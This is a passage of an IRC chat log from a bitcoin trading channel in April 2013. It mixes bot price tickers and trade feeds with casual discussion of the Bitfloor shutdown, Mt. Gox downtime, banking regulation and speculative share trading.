0 Apr 18 17:26:16 There are currently 99247013 bitcoins demanded at or over 0.0 USD, worth 19912477.3474 USD in total. | Data vintage: 25.8990 seconds Apr 18 17:26:40 20M$ Cmon ONE TIME ! Apr 18 17:31:03 [HAVELOCK] [VTX] 5 @ 0.43000001 = 2.15 BTC [-] Apr 18 17:31:04 [HAVELOCK] [VTX] 2 @ 0.43 = 0.86 BTC [-] Apr 18 17:31:06 [HAVELOCK] [VTX] 3 @ 0.4271666 = 1.2815 BTC [-] Apr 18 17:31:07 [HAVELOCK] [VTX] 2 @ 0.425 = 0.85 BTC [-] Apr 18 17:31:07 [HAVELOCK] [VTX] 6 @ 0.42 = 2.52 BTC [-] Apr 18 17:31:08 [HAVELOCK] [VTX] 3 @ 0.417 = 1.251 BTC [-] Apr 18 17:31:09 [HAVELOCK] [VTX] 1 @ 0.4 BTC [-] Apr 18 17:31:10 [HAVELOCK] [VTX] 3 @ 0.3989 = 1.1967 BTC [-] Apr 18 17:32:37 it's only less than 100k short Apr 18 17:33:01 let me put in a quick buy order for 100k bitcoins Apr 18 17:33:06 please Apr 18 17:33:10 100kusd worth of btc Apr 18 17:33:18 you want some change ? Apr 18 17:33:23 [MPEX] [S.MPOE] 9425 @ 0.00068035 = 6.4123 BTC [-] Apr 18 17:33:39 maybe in my couch ! let me check Apr 18 17:35:34 orkaa: funny video Apr 18 17:36:38 dat buy Apr 18 17:39:03 [BTCTC] [S.DICE-PT] 22 @ 0.0041 = 0.0902 BTC [+] Apr 18 17:42:03 [HAVELOCK] [SDICE] 2 @ 0.32000006 = 0.64 BTC [-] Apr 18 17:43:02 [HAVELOCK] [SDICE] 1 @ 0.32000001 BTC [-] Apr 18 17:43:04 [HAVELOCK] [SDICE] 10 @ 0.32 = 3.2 BTC [-] Apr 18 17:45:03 [HAVELOCK] [SDICE] 1 @ 0.32 BTC [-] Apr 18 17:48:15 ;;bids 0 Apr 18 17:48:15 There are currently 99252549 bitcoins demanded at or over 0.0 USD, worth 20327226.4718 USD in total. | Data vintage: 37.1946 seconds Apr 18 17:50:29 ;;ticker Apr 18 17:50:30 BTCUSD ticker | Best bid: 94.30000, Best ask: 94.39000, Bid-ask spread: 0.09000, Last trade: 94.22000, 24 hour volume: 198258.25230075, 24 hour low: 83.00000, 24 hour high: 95.70000, 24 hour vwap: 90.69850 Apr 18 17:52:29 [MPEX] [S.MPOE] 5100 @ 0.00068035 = 3.4698 BTC [-] Apr 18 17:52:35 I have never seen so many millions in bids Apr 18 17:52:46 ;;asks 260 Apr 18 17:52:46 There are currently 105104.93 bitcoins offered at or under 260.0 USD, worth 16053671.2769 USD in total. | Data vintage: 34.9561 seconds Apr 18 17:53:01 hmmm... http://www.youtube.com/watch?v=goSaEQ9Z8Wg Apr 18 17:58:01 first time 20M$ bids !! this is huge Apr 18 17:58:36 20m bids? Apr 18 17:59:34 ;;bids 0 Apr 18 17:59:34 There are currently 99252722 bitcoins demanded at or over 0.0 USD, worth 20351513.2657 USD in total. | Data vintage: 73.3459 seconds Apr 18 17:59:57 is this the first time? Apr 18 18:03:30 in my memory it is Apr 18 18:03:46 over the last 2-3 days, its increased by 5 million Apr 18 18:04:02 [HAVELOCK] [SDICE] 3 @ 0.306 = 0.918 BTC [-] Apr 18 18:04:04 [HAVELOCK] [SDICE] 29 @ 0.261 = 7.569 BTC [-] Apr 18 18:04:05 [HAVELOCK] [SDICE] 8 @ 0.2602 = 2.0816 BTC [-] Apr 18 18:04:06 [HAVELOCK] [SDICE] 1 @ 0.2601 BTC [-] Apr 18 18:04:07 [HAVELOCK] [SDICE] 1 @ 0.2601 BTC [-] Apr 18 18:04:08 [HAVELOCK] [SDICE] 2 @ 0.25 = 0.5 BTC [-] Apr 18 18:04:10 [HAVELOCK] [SDICE] 10 @ 0.25 = 2.5 BTC [-] Apr 18 18:04:10 [HAVELOCK] [SDICE] 7 @ 0.24 = 1.68 BTC [-] Apr 18 18:06:52 [MPEX] [S.DICE] 1000 @ 0.00310001 = 3.1 BTC [-] Apr 18 18:06:55 [MPEX] [S.DICE] 1000 @ 0.00300502 = 3.005 BTC [-] Apr 18 18:06:56 [MPEX] [S.DICE] 1000 @ 0.00300501 = 3.005 BTC [-] Apr 18 18:06:57 [MPEX] [S.DICE] 2000 @ 0.003005 = 6.01 BTC [-] Apr 18 18:07:04 [MPEX] [S.DICE] 2600 @ 0.003 = 7.8 BTC [-] Apr 18 18:07:06 [MPEX] [S.DICE] 3000 @ 0.0029 = 8.7 BTC [-] Apr 18 18:07:08 [MPEX] [S.DICE] 1000 @ 0.00288242 = 2.8824 BTC [-] Apr 18 18:07:12 [MPEX] [S.DICE] 500 @ 0.00275 = 1.375 BTC [-] Apr 18 18:07:14 [MPEX] [S.DICE] 1000 @ 0.00270003 = 2.7 BTC [-] Apr 18 18:07:23 [MPEX] [S.DICE] 2000 @ 0.00270001 = 5.4 BTC [-] Apr 18 18:07:25 [MPEX] [S.DICE] 474 @ 0.0027 = 1.2798 BTC [-] Apr 18 18:07:54 ;;ticker Apr 18 18:07:54 BTCUSD ticker | Best bid: 94.00000, Best ask: 94.19998, Bid-ask spread: 0.19998, Last trade: 94.00000, 24 hour volume: 194747.98048834, 24 hour low: 83.00000, 24 hour high: 95.70000, 24 hour vwap: 90.73874 Apr 18 18:08:55 [MPEX] [S.MPOE] 2310 @ 0.00068475 = 1.5818 BTC [+] Apr 18 18:12:28 you're welcome error Apr 18 18:18:41 bitflooor lol Apr 18 18:19:00 poor bitfloor Apr 18 18:19:05 poor? Apr 18 18:19:12 they stole 25,000BTC Apr 18 18:19:15 what do you expect? Apr 18 18:19:37 Bitcoin exchange BitFloor shuts its doors, promises to return everyone's money Apr 18 18:19:37 The Verge‎ - 12 hours ago Apr 18 18:19:42 'promises' Apr 18 18:19:56 and you know how you can't break promises Apr 18 18:20:28 Do you think it has anything to do with this? Bitfloor Hacked, $250,000 Missing | Bitcoin Magazine Apr 18 18:20:42 Bitfloor, the fourth largest exchange dealing in US dollars, has just announced that it has been hacked, and the service has taken a loss of 24,000 BTC Apr 18 18:21:00 a good chance he stole the money the first time Apr 18 18:22:46 my auction is still running Apr 18 18:23:01 https://bitcointalk.org/index.php?topic=179065 Apr 18 18:23:01 true Apr 18 18:23:03 [MPEX] [S.DICE] 50 @ 0.00339 = 0.1695 BTC [+] Apr 18 18:24:43 huh? Apr 18 18:24:53 why would you steal the money, then go back to running the exchange Apr 18 18:24:59 no one lost money at bitfloor yesterday Apr 18 18:25:02 to get the money a second time Apr 18 18:25:05 oh? Apr 18 18:25:10 except he gave the money out Apr 18 18:25:12 have people been able to withdraw? Apr 18 18:25:16 in fact you can still withdraw currently Apr 18 18:25:18 btc Apr 18 18:25:20 if you want fiat Apr 18 18:25:25 you have to wait for ACH Apr 18 18:25:34 that is what he meant by "i am giving all the money back" Apr 18 18:25:43 it means he's giving all accounts their money Apr 18 18:25:54 well… I would be sure to be first Apr 18 18:25:56 in fact he texted me to tell me to withdraw any btc i have Apr 18 18:26:04 which i did Apr 18 18:26:09 cause there might not be enough for the last person Apr 18 18:26:30 huh? Apr 18 18:26:41 the hacking incident is completely unrelated to him closing Apr 18 18:26:48 he owes those people x number of coins Apr 18 18:26:55 nothing to do with current accounts Apr 18 18:27:03 Its the same entity Apr 18 18:27:08 yes Apr 18 18:27:16 why do new accounts have preference over old accounts Apr 18 18:27:20 can't be legal Apr 18 18:27:28 he has a debt to them Apr 18 18:27:33 lawsuit waiting to happen Apr 18 18:27:39 yeah, any year now Apr 18 18:27:47 considering him getting hacked was over a year ago Apr 18 18:27:50 i believe Apr 18 18:28:06 i personally did all my exchanging there Apr 18 18:28:09 and never had one problem Apr 18 18:28:26 y shutting down? Apr 18 18:28:33 bank account closed Apr 18 18:28:47 more than likely recent upsurge of volume in cash...raised some eyebrows Apr 18 18:29:08 so i think they closed his bank account or something like that Apr 18 18:29:26 no details, but it has to do with fincen regs i think Apr 18 18:29:32 or at the very least AML Apr 18 18:29:43 I heard he was talking to another bank and might re-open in 4 weeks Apr 18 18:29:48 who would go there though? Apr 18 18:29:49 possible Apr 18 18:29:59 if he can figure out the AML stuff, compliance with fincen regs Apr 18 18:30:02 no reason why not Apr 18 18:30:37 he can't figure it out Apr 18 18:30:40 that much is clear Apr 18 18:30:47 why not? Apr 18 18:30:50 because he is operating illegally Apr 18 18:30:56 and has been since being hacked Apr 18 18:30:59 i wouldn't talk to a bank so i could have them help me operate illegally Apr 18 18:31:08 no, has been since inception Apr 18 18:31:12 yeha Apr 18 18:31:15 or technically since fincen released guidance Apr 18 18:31:26 again hacking had nothing to do with closing Apr 18 18:31:48 hacking was just to hurt his reputation Apr 18 18:31:52 i would talk to a bank so they could help me implement KYC and AML Apr 18 18:32:00 you're syaing they didn't make off with 24k BTC though? Apr 18 18:32:02 mtgox is 502 Apr 18 18:32:04 down Apr 18 18:32:11 lippoper: someone did Apr 18 18:32:14 we don't know who Apr 18 18:32:14 diablo-d3 , how long till the auction ends? Apr 18 18:32:14 i'm still getting mt gox data Apr 18 18:32:25 its flying in on the api Apr 18 18:32:39 I can't login Apr 18 18:32:45 weird Apr 18 18:32:50 need to withdraw more Apr 18 18:32:52 i'm just watching market data Apr 18 18:33:04 ;;goxlag Apr 18 18:33:05 Error: Problem retrieving gox lag. Try again later. Apr 18 18:33:13 someone needs to restart gribble Apr 18 18:33:16 i think no? Apr 18 18:37:46 prob ddos Apr 18 18:38:53 ;;bids 0 Apr 18 18:38:53 There are currently 99252456 bitcoins demanded at or over 0.0 USD, worth 20514882.8485 USD in total. | Data vintage: 20.9792 seconds Apr 18 18:40:04 gox is down hard, huh? Apr 18 18:40:37 [BTCTC] [BTC-BOND] 997 @ 0.01 = 9.97 BTC [+] Apr 18 18:41:08 very hard Apr 18 18:41:36 fuckin' joke... Apr 18 18:41:43 it ddos Apr 18 18:41:47 blockchain.info down all day Apr 18 18:41:57 get ready for the crash Apr 18 18:42:22 funny video while we wait http://www.youtube.com/watch?v=K2ku1A5Ox8U Apr 18 18:43:03 i freaking hope so Apr 18 18:43:09 I totally fucked up Apr 18 18:43:24 how? Apr 18 18:43:25 bought a TON of coins at 65 Apr 18 18:43:40 sold them at 70 Apr 18 18:43:41 :( Apr 18 18:43:43 lol Apr 18 18:43:44 how muchis a ton Apr 18 18:43:53 I'm at 0.29% Apr 18 18:43:54 you'll have another chance Apr 18 18:43:56 what did you buy Ripples? Apr 18 18:43:58 lol Apr 18 18:44:26 I thought the buy wall at 70 was fake Apr 18 18:44:27 it was not Apr 18 18:44:49 LOL Apr 18 18:44:56 evident by your sales Apr 18 18:45:16 i just sold 2 at 95 Apr 18 18:45:18 [BTCTC] [LTC-MINING] 1 @ 0.34589 BTC [+] Apr 18 18:45:31 gonna use that liquidity to buy it up at whatever price gox comes back with Apr 18 18:45:32 lol Apr 18 18:45:50 for a .01% gain lmao Apr 18 18:45:59 -1% for fees Apr 18 18:46:05 i'm cashing out more today Apr 18 18:46:06 *facepalm Apr 18 18:46:14 after this all i have left is sdice Apr 18 18:46:30 and some miners Apr 18 18:46:42 and a lil mpoe Apr 18 18:46:44 hehe Apr 18 18:46:44 ;;bids 69 Apr 18 18:46:44 There are currently 101606.17 bitcoins demanded at or over 69.0 USD, worth 7989462.52678 USD in total. | Data vintage: 85.4055 seconds Apr 18 18:46:57 ;;bids 0 Apr 18 18:46:58 There are currently 99261721 bitcoins demanded at or over 0.0 USD, worth 20535034.3746 USD in total. | Data vintage: 98.7360 seconds Apr 18 18:47:02 jesus Apr 18 18:47:04 20M Apr 18 18:47:46 dont beleve the hype Apr 18 18:47:51 believe Apr 18 18:49:10 is 20mil a new high? Apr 18 18:49:16 yeah Apr 18 18:49:35 but $10m+ of it are the manipulators Apr 18 18:49:43 surely they prefer to buy at 40 Apr 18 18:50:46 [BTCTC] [S.MPOE-PT] 1 @ 0.000699 BTC [+] Apr 18 18:50:56 perhaps Apr 18 18:50:57 20MM is bullshit Apr 18 18:51:03 i'm still getting good data Apr 18 18:51:05 over the api Apr 18 18:51:08 very quick too Apr 18 18:51:28 MJR_: cached by cloudflare Apr 18 18:51:33 price? Apr 18 18:52:50 how does cloudflare cache a websocket stream Apr 18 18:53:05 94.20/94.47 Apr 18 18:53:18 94.06 last Apr 18 18:53:28 ah, thought you meant the http api Apr 18 18:54:14 nope, the socket.io is working beautifully so far Apr 18 18:54:20 been running since this morning Apr 18 18:54:25 gox is up Apr 18 18:54:36 of course it isn't super readable, but i can make it out if i stare at the right spots Apr 18 18:55:34 it just started lagging Apr 18 18:55:36 a tiny bit Apr 18 18:55:37 Gox = WORST EXCHANGE ON PLANET Apr 18 18:55:40 just got more $ out of gox Apr 18 18:55:50 Gox = BEST BITCOIN EXCHANGE ON PLANET Apr 18 18:55:52 sadly Apr 18 18:57:25 lol Apr 18 18:58:15 now that bitfloor and bitcoin24 are gone, soon gox will be ONLY bitcoin exchange on planet Apr 18 19:00:39 campbx should make their site less ugly meby the'd get some customers Apr 18 19:02:17 campbx will like be next to fold Apr 18 19:02:49 up we go Apr 18 19:04:18 Why would it fold? Apr 18 19:04:40 i'm not sure, they seem pretty legit and in check with legal stuff Apr 18 19:04:45 and they've been up for 2 years almost now Apr 18 19:04:52 ;;ticker Apr 18 19:04:53 BTCUSD ticker | Best bid: 95.90000, Best ask: 95.97999, Bid-ask spread: 0.07999, Last trade: 95.97999, 24 hour volume: 176637.04484907, 24 hour low: 83.00000, 24 hour high: 95.91100, 24 hour vwap: 90.73430 Apr 18 19:04:56 yeah that's why I asked. Apr 18 19:04:58 come on 100 Apr 18 19:05:11 ;;next Apr 18 19:05:12 support: 91, 86 | targets: 100-102, 105, 110-113, 120, ..., 50% retracement at 160, new highs? | updated by OneFixt at Apr 18 2013, 08:08 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 7 hours, 57 minutes, and 10 seconds ago Apr 18 19:05:22 how about btc-e? is there something evil about it? Apr 18 19:05:25 govt will crack down Apr 18 19:05:30 btce is russians Apr 18 19:05:41 CTFC will want to regulate Apr 18 19:05:59 bitfloor prolly closed because of FinCEN Apr 18 19:06:09 Tell it to go regulate the real criminals it keeps letting off the hook Apr 18 19:06:19 Wait CTFC are the criminals Apr 18 19:06:26 ye Apr 18 19:06:29 yes Apr 18 19:06:30 nothing against russians, but the fact that you can just take bitcoins and close up shop... who knows, maybe if t hey got enough in deposits they'll suddenly claim a "hack" or something... but that's the danger with any exchnage Apr 18 19:06:41 [MPEX] [S.DICE] 2000 @ 0.00275213 = 5.5043 BTC [-] Apr 18 19:07:08 doesn't change the fact that running an axchange in the US will be a real headache Apr 18 19:07:09 i love this cascade of little breakouts Apr 18 19:07:21 unless you have deep pockets and scall Apr 18 19:07:23 scale Apr 18 19:07:41 yep, maybe max keisers one wil be good, london based Apr 18 19:07:50 they usually are really liberal with their financial regulations Apr 18 19:07:55 I doubt they do it that way Apr 18 19:07:57 or not Apr 18 19:08:00 binary options? Apr 18 19:08:23 blockchain and gox had to shutdown their uk bank accounts Apr 18 19:08:33 oh, snap Apr 18 19:08:40 They will let more people get in to BTC create a giant calamity in wich people lose tons then find some people to tell how they lost it all and how unfortunate they are. Apr 18 19:08:49 Then they will outlaw all crypto coins Apr 18 19:08:54 for our own protection Apr 18 19:09:16 could happen yea Apr 18 19:09:23 outlaw - no... make it really difficult to convert fiat to crypto, yes... Apr 18 19:10:08 not sure how you can actually outlaw bitcoin... at least in US... Apr 18 19:10:47 i think that in the end there is a strong first ammendment argument to be made that bitcoin is a form of speech Apr 18 19:10:49 label them as hiyt or what they are called Apr 18 19:11:13 hyip Apr 18 19:11:34 ;;ticker Apr 18 19:11:35 BTCUSD ticker | Best bid: 95.74999, Best ask: 95.96230, Bid-ask spread: 0.21231, Last trade: 95.96230, 24 hour volume: 175919.78736906, 24 hour low: 83.00000, 24 hour high: 96.00000, 24 hour vwap: 90.72937 Apr 18 19:12:08 [MPEX] [S.DICE] 464 @ 0.00275213 = 1.277 BTC [-] Apr 18 19:16:08 ;;bids 0 Apr 18 19:16:09 There are currently 99263832 bitcoins demanded at or over 0.0 USD, worth 20523346.483 USD in total. | Data vintage: 93.8686 seconds Apr 18 19:16:35 !asks 265.9 Apr 18 19:16:48 ;;asks 265.9 Apr 18 19:16:50 There are currently 101929.89 bitcoins offered at or under 265.9 USD, worth 16175085.4369 USD in total. | Data vintage: 0.0077 seconds Apr 18 19:18:47 [MPEX] [S.MPOE] 9400 @ 0.00068475 = 6.4367 BTC [+] Apr 18 19:46:39 ;;bids 0 Apr 18 19:46:41 There are currently 99264378 bitcoins demanded at or over 0.0 USD, worth 20874550.2445 USD in total. | Data vintage: 0.0196 seconds Apr 18 19:46:50 wut Apr 18 19:47:10 how the fuck did this jump sky high in 1 day Apr 18 19:47:27 oh, that's awesome Apr 18 19:47:59 is this gox getting round to bumper subscriptions from the ath 10days ago ? Apr 18 19:50:43 [BTCTC] [ASICMINER-PT] 2 @ 1.39 = 2.78 BTC [-] Apr 18 19:50:51 [BTCTC] [ASICMINER-PT] 3 @ 1.36 = 4.08 BTC [-] Apr 18 20:07:03 this one too huh https://bitcoin-24.com/ Apr 18 20:10:50 ;;ticker Apr 18 20:10:51 BTCUSD ticker | Best bid: 96.50001, Best ask: 96.54000, Bid-ask spread: 0.03999, Last trade: 96.54000, 24 hour volume: 167037.83440532, 24 hour low: 83.00000, 24 hour high: 97.59000, 24 hour vwap: 91.04704 Apr 18 20:11:00 https://twitter.com/Bitcoin24com Apr 18 20:11:09 "It is time for something new. A new big business and a very serious Company, which can not be fuc***! We will be back for sure!" Apr 18 20:11:15 ;;seen smickles Apr 18 20:11:15 smickles was last seen in #bitcoin-assets 2 weeks, 0 days, 1 hour, 28 minutes, and 41 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Apr 18 20:16:19 ;;next Apr 18 20:16:19 support: 91, 86 | targets: 100-102, 105, 110-113, 120, ..., 50% retracement at 160, new highs? | updated by OneFixt at Apr 18 2013, 08:08 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 9 hours, 8 minutes, and 17 seconds ago Apr 18 20:17:15 [BTCTC] [ASICMINER-PT] 1 @ 1.29 BTC [-] Apr 18 20:17:18 [BTCTC] [ASICMINER-PT] 12 @ 1.28 = 15.36 BTC [-] Apr 18 20:17:21 [BTCTC] [ASICMINER-PT] 3 @ 1.275 = 3.825 BTC [-] Apr 18 20:30:54 where is bitfinex? Apr 18 20:31:18 are they likely to be shut down? Apr 18 20:32:20 [MPEX] [S.MPOE] 3940 @ 0.00068475 = 2.6979 BTC [+] Apr 18 20:33:40 I always wondered when this would start happening Apr 18 20:34:01 Banks finally saying eff you, closing that account buh bye Exchange. Apr 18 20:34:31 I wonder how hard it would be to make a Bank Apr 18 20:34:43 FUnd it just for Bitcoin trade Apr 18 20:34:50 Bet it would be near impossible Apr 18 20:35:26 very Apr 18 20:46:12 look at BFL Apr 18 20:46:15 they've basically done that Apr 18 20:46:26 they've taken millions of dollars of pre-order funds Apr 18 20:46:30 and are using it to mine Apr 18 20:46:34 for themselves lol Apr 18 20:47:01 Uhh, I think we would notice that fairly quickly. Apr 18 20:47:02 while scaring potential miners because of their mystical pink unicorn like ASICS that could ship at any minute now Apr 18 20:47:12 fiat banks declaring total war on BTC was only a matter of time. seriously, it isn't like nobody saw it coming. Apr 18 20:47:35 they just want their portion of the fees aciilifeform Apr 18 20:47:49 They are getting the fees Apr 18 20:47:52 i'm sure once they get a little slice of heaven they'll stop being so jealous Apr 18 20:47:59 i agree Apr 18 20:48:27 It cost you every time you transfer money so they were making money off BTC but losing in another way much bigger if BTC actually got adopted as a true payment sytem Apr 18 20:48:29 fiat banks don't want to deal with BTC exchanges Apr 18 20:48:52 [BTCTC] [ASICMINER-PT] 2 @ 1.252 = 2.504 BTC [-] Apr 18 20:48:55 [BTCTC] [ASICMINER-PT] 2 @ 1.241 = 2.482 BTC [-] Apr 18 20:48:59 [BTCTC] [ASICMINER-PT] 1 @ 1.24001 BTC [-] Apr 18 20:49:03 [BTCTC] [ASICMINER-PT] 1 @ 1.24 BTC [-] Apr 18 20:49:04 They stand to lose Power, Control, and Money if BTC was adopted. Apr 18 20:49:09 [BTCTC] [ASICMINER-PT] 1 @ 1.24 BTC [-] Apr 18 20:49:12 I think the Power is the most important part. Apr 18 20:49:13 [BTCTC] [ASICMINER-PT] 1 @ 1.23 BTC [-] Apr 18 20:49:20 [BTCTC] [ASICMINER-PT] 1 @ 1.211 BTC [-] Apr 18 20:49:23 [BTCTC] [ASICMINER-PT] 1 @ 1.2 BTC [-] Apr 18 20:49:37 Wow, glad I ditched mine yesterday. Apr 18 20:49:51 bought a 8 at 72, then sold at 1.30 Apr 18 20:50:05 [BTCTC] [ASICMINER-PT] 8 @ 1.2 = 9.6 BTC [-] Apr 18 20:50:08 [BTCTC] [ASICMINER-PT] 9 @ 1.2 = 10.8 BTC [-] Apr 18 20:50:11 fiat banks won't surrender to the idea of moving $1 across the ocean costing $0. They want it to cost ~$50 (in pure profit for the parasites,) as it does now. Apr 18 20:50:15 Now to get a bunch more cheap! Apr 18 20:51:47 Why is ASIC MINER doing so bad Doffx? Apr 18 20:52:03 Its not, people are just speculating. Apr 18 20:52:08 1.2 is not bad Apr 18 20:52:24 Its up quite a bit Apr 18 20:52:36 I just wanted to get out at the peak Apr 18 20:52:51 I was just day tried for a fast btc, worked out this time. Apr 18 20:53:01 err day trading weps Apr 18 20:57:57 [BTCTC] [ASICMINER-PT] 1 @ 1.00001 BTC [-] Apr 18 20:58:00 [BTCTC] [ASICMINER-PT] 15 @ 1 = 15 BTC [-] Apr 18 21:10:35 [MPEX] [S.MPOE] 468 @ 0.00069463 = 0.3251 BTC [+] Apr 18 21:11:02 [HAVELOCK] [SDICE] 3 @ 0.335 = 1.005 BTC [+] Apr 18 21:28:06 [BTCTC] [BASIC-MINING] 4 @ 0.44 = 1.76 BTC [+] Apr 18 21:28:51 [BTCTC] [CRYPTO-TRADE] 4 @ 0.199 = 0.796 BTC [+] Apr 18 21:38:57 [BTCTC] [ASICMINER-PT] 1 @ 1.23397 BTC [+] Apr 18 21:48:59 [BTCTC] [ASICMINER-PT] 1 @ 0.96503 BTC [-] Apr 18 21:49:02 lol tradehill going to argentina http://www.bloomberg.com/news/2013-04-16/bitcoin-dreams-endure-to-savers-crushed-by-cpi-argentina-credit.html Apr 18 21:50:26 "Kenna is seeking to partner with a local bank to open an exchange in the country." Apr 18 21:50:41 [BTCTC] [ASICMINER-PT] 4 @ 0.96502 = 3.8601 BTC [-] Apr 18 21:55:27 ;;bc,convert eur Apr 18 21:55:28 1 BTC = 95.10000 U.S. dollars = 72.9070837 Euros Apr 18 21:56:47 [MPEX] [S.MPOE] 22300 @ 0.00072228 = 16.1068 BTC [+] Apr 18 21:56:49 [MPEX] [S.MPOE] 293 @ 0.00072397 = 0.2121 BTC [+] Apr 18 21:56:57 [MPEX] [S.MPOE] 18807 @ 0.00073 = 13.7291 BTC [+] Apr 18 22:08:45 mpoe at new highs Apr 18 22:08:46 $avg Apr 18 22:08:47 pizzaman1337: 91.99 Apr 18 22:08:53 ;;next Apr 18 22:08:53 support: 91, 86 | targets: 100-102, 105, 110-113, 120, ..., 50% retracement at 160, new highs? | updated by OneFixt at Apr 18 2013, 08:08 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 11 hours and 51 seconds ago Apr 18 22:56:03 !t m S.DICE Apr 18 22:56:04 [MPEX:S.DICE] 1D: 0.0027 / 0.00294867 / 0.00346247 (20988 shares, 61.89 BTC), 7D: 0.0027 / 0.00347087 / 0.00439999 (88231 shares, 306.24 BTC), 30D: 0.0027 / 0.00340411 / 0.005598 (1807229 shares, 6,152.01 BTC) Apr 18 22:56:34 [BTCTC] [COGNITIVE] 3 @ 0.16 = 0.48 BTC [-] Apr 18 22:56:41 [BTCTC] [COGNITIVE] 7 @ 0.159 = 1.113 BTC [-] Apr 18 23:02:41 [BTCTC] [ASICMINER-PT] 1 @ 1.19987 BTC [+] Apr 18 23:02:50 [BTCTC] [ASICMINER-PT] 1 @ 1.199879 BTC [+] Apr 18 23:02:54 [BTCTC] [ASICMINER-PT] 1 @ 1.2 BTC [+] Apr 18 23:04:36 what's wrong with s.dice? Apr 18 23:05:28 i know the answer to this one; it does each of it's transactions in the blockchain Apr 18 23:05:35 :b Apr 18 23:07:25 still making big profit Apr 18 23:11:25 [MPEX] [S.MPOE] 6193 @ 0.00073 = 4.5209 BTC [+] Apr 18 23:13:47 24h volume back down to 135k at gox... Apr 18 23:18:52 ;;bids 0 Apr 18 23:18:52 There are currently 99273220 bitcoins demanded at or over 0.0 USD, worth 21139142.3182 USD in total. | Data vintage: 15.7309 seconds Apr 18 23:18:56 wow Apr 18 23:19:02 [HAVELOCK] [VTX] 3 @ 0.4 = 1.2 BTC [+] Apr 18 23:19:04 [HAVELOCK] [VTX] 5 @ 0.399 = 1.995 BTC [-] Apr 18 23:19:05 [HAVELOCK] [VTX] 10 @ 0.39890001 = 3.989 BTC [-] Apr 18 23:19:06 [HAVELOCK] [VTX] 2 @ 0.3989 = 0.7978 BTC [-] Apr 18 23:19:07 [HAVELOCK] [VTX] 15 @ 0.395 = 5.925 BTC [-] Apr 18 23:19:08 [HAVELOCK] [VTX] 2 @ 0.39 = 0.78 BTC [-] Apr 18 23:19:09 [HAVELOCK] [VTX] 3 @ 0.38 = 1.14 BTC [-] Apr 18 23:19:10 [HAVELOCK] [VTX] 7 @ 0.38 = 2.66 BTC [-] Apr 18 23:19:11 [HAVELOCK] [VTX] 50 @ 0.37 = 18.5 BTC [-] Apr 18 23:19:47 Is tradehill up and running currently? Apr 18 23:22:49 what's the deal with s.dice. anyone have a guess for where the price is going? Apr 18 23:23:21 sorry, i see that someone just asked that Apr 18 23:24:44 [MPEX] [S.MPOE] 2707 @ 0.00073338 = 1.9853 BTC [+] Apr 18 23:25:20 its going up and down Apr 18 23:25:27 afaik Apr 18 23:25:34 what's the safest bet for like 10btc right now: s.dice or BTC-BOND? Apr 18 23:25:37 up again after that Apr 18 23:25:44 safe = bind Apr 18 23:25:47 bond Apr 18 23:26:27 will s.dice go back up, or do you guys think it will go down before it goes back up? Apr 18 23:28:29 the outcome will be the same, no? Apr 18 23:28:44 50% up, 50% down Apr 18 23:28:45 i guess you're right... weird question. Apr 18 23:28:48 i am a wizard fyi Apr 18 23:28:55 hehe Apr 18 23:31:16 i'd buy s.dice to expect more profit... but you need strong nerves, its movememnts defy all logic Apr 18 23:31:25 I feel with s.dice that, the way the btc/usd price has been wild, the dividends will not really pay for the profit loss in terms of share to btc resale value... Apr 18 23:31:48 neither btc-bond will do that Apr 18 23:32:16 you mean, the dividends don't pay for the loss in share value? Apr 18 23:32:44 you can't expect them to Apr 18 23:33:38 s.dice has nothing to do with usd Apr 18 23:34:04 if you fear btc crash so much, do some spreadsheet yourself and buy some puts instead Apr 18 23:34:14 in as much as affecting the value of BTC Apr 18 23:34:15 or divide the investment Apr 18 23:35:35 s.dice firmly captured a part of btc economy and any usd movements affect it mildly at most Apr 18 23:36:37 yeah, I was about to say, it was at 0.006 and went to 0.003 during the latest btc/usd bubble Apr 18 23:37:02 price per share Apr 18 23:37:32 I see Apr 18 23:38:17 so, long-term would be better to trade a few for m.poe or something? Apr 18 23:38:43 same could be said about mtgox Apr 18 23:38:43 lol Apr 18 23:39:12 both have been proven to be run by idiots Apr 18 23:39:30 who are you talking to? tiberiusiv? i am ignoring him for a reason Apr 18 23:39:46 oh yeah he usually trolls Apr 18 23:40:39 lol last time i was in here you were calling mircea a gypsy over and over and telling us he makes a living stealing chickens Apr 18 23:40:41 or some other bs Apr 18 23:44:59 for example i have ignored after he came up with this: mircea has lost in 1month probably more bitcoins then 95% of this channel hold combined. Apr 18 23:45:35 such "fact" i know for certain was just some ass pull Apr 18 23:50:50 jurov, you're not missing anything Apr 18 23:51:08 ;;next Apr 18 23:51:08 support: 91, 86 | targets: 100-102, 105, 110-113, 120, ..., 50% retracement at 160, new highs? | updated by OneFixt at Apr 18 2013, 08:08 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 12 hours, 43 minutes, and 6 seconds ago Apr 18 23:53:48 soypirate: the ass fell out of s.deuce well before the latest bubble Apr 18 23:54:34 for the reason we all know but don't like to say Apr 18 23:55:04 jurov nearly got there Apr 18 23:58:03 [HAVELOCK] [HIM] 2 @ 1.82 = 3.64 BTC [+] Apr 18 23:59:03 [HAVELOCK] [KCIM] 1 @ 1.3789999 BTC [+] Apr 18 23:59:45 i'm sorry, I'm not aware Apr 19 00:00:39 [BTCTC] [CRYPTO-TRADE] 1 @ 0.199 BTC [+] Apr 19 00:00:56 ;;ticker Apr 19 00:00:56 BTCUSD ticker | Best bid: 96.70000, Best ask: 96.75000, Bid-ask spread: 0.05000, Last trade: 96.75000, 24 hour volume: 128874.27980737, 24 hour low: 86.00000, 24 hour high: 97.59000, 24 hour vwap: 92.62337 Apr 19 00:00:57 i'd buy s.dice to expect more profit... but you need strong nerves, its movememnts defy all logic Apr 19 00:01:10 s/movements/issuer Apr 19 00:01:12 ;;bids 0 Apr 19 00:01:12 There are currently 99274016 bitcoins demanded at or over 0.0 USD, worth 21096363.1057 USD in total. | Data vintage: 71.6021 seconds Apr 19 00:01:50 so, even though I would sell at a loss, I should take out anything significant from s.dice? Apr 19 00:02:11 just to save some of it? Apr 19 00:02:29 you could stick it out and hope for 